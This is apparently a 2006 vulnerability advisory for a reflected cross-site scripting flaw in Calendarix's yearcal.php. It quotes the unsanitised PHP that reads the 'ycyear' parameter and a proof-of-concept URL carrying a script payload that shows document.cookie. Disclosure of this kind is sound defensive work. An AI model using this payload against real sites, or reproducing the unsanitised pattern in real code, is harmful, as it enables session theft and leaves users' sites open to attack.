Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12267
HistoryApr 17, 2006 - 12:00 a.m.

Calendarix "yearcal.php" XSS Attacking

2006-04-1700:00:00
vulners.com
13

Website : http://www.calendarix.com

Vulnerable :

if (!isset($_GET['ycyear']))
$ycyear = $y ;
else
$ycyear = $_GET['ycyear'];

http://www.site.com/[path]/yearcal.php?ycyear=<script>alert(document.cookie)</script>